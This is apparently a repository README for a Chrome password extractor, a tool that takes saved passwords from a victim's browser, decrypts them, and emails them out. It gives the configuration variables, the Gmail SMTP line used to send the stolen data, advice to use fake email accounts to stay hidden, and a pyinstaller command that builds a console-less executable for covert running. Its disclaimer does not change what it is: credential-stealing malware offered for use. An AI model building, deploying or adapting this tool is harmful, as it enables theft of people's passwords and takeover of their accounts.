# chrome_password_extractor

**Disclaimer: Please note that while I am the one who wrote this script, I am not in any way responsible for any individual who uses this for any unethical stuff.**

The chrome_password_extractor is a tool I've designed to grab saved passwords from an individual's google chrome browser.

There are two folders inside the repo in which you will find your executables and python source files. I used the pyinstaller module to freeze the source codes.

## Old

The Executable present in Old will essentially grab the login data file of Chrome, name it 'cleaned' and decrypt in and store it in a text file called 'a.txt'

## Updated

The Python script in the updated file not only allows you to carry out the earlier functions but has additional features. This updated scipt allows you the recieve all the passwords in you mail. What it'll do is check if the computer is connect to the internet. If it's connect it will send you an email otherwise it will create a .txt file containing the passwords like the older script.

All you have to do is initialize these variables:

    sender = "Sender's Email Address"
    reciever = "Reciver's Email Address"
    password1 = "Sender's Email Password"

* Sender's email address is the address you want to send the email from. Preferrably set it to a fake email.
* reciever's email address is the address you want ot recieve the email in . Set it to your own address or for extra safety, set to to another fake email.

If you want to use any mailing service other than gmail, you will have to edit the function:

    smtpObj = smtplib.SMTP('smtp.gmail.com', 587)

set the address to the smtp address of the email service you want to use and replace '587' with the tls port of that service.

### Make an exe file from the script

You may use any freezing library you want to freeze the file. I Prefer to use pyinstaller so, I will be showing you how to do this with pyinstaller.

* Firstly install pyinstaller using pip install
* Using your Command line cd into the directory where the script is kept.
* Then use the pyinstaller command to freeze the file:

It will look like:

    pyinstaller --onefile --noconsole main.py

* You can delete any other file or folder generated by pyinstaller other than the dist folder as it contains the .exe file that you will need.